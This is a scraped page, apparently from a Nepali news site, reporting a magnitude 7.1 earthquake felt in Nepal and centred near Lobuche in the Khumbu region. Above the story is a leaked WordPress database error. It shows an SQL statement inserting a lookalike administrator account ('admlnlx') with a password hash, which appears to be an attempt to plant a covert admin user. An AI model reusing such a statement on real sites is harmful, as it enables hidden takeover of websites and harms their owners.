WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bnu1RExk9tuGvsWTpfLXmUgEOsNVdh0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 10:07:43', '', 'admlnlx', 'admlnlx')
काठमाडौ । नेपालमा शक्तिशाली भूकम्पको झट्का महसुस गरिएको छ ।
आज बिहान ६ बजेर ५० मिनेट आसपास उक्त भुकम्पको झट्का महसुस गरिएको हो ।
अमेरिकी भौगर्भिक निकाय यूएसजीएसले उक्त भूकम्प ७ दशमलव १ म्याग्निट्यूडको भएको उल्लेख गरेको छ ।
उसका अनुसार उक्त भूकम्पको केन्द्रबिन्दु खुम्बु क्षेत्रमा अवस्थित लोबुचे भन्दा उत्तर पूर्वमा रहेको जनाइएको छ ।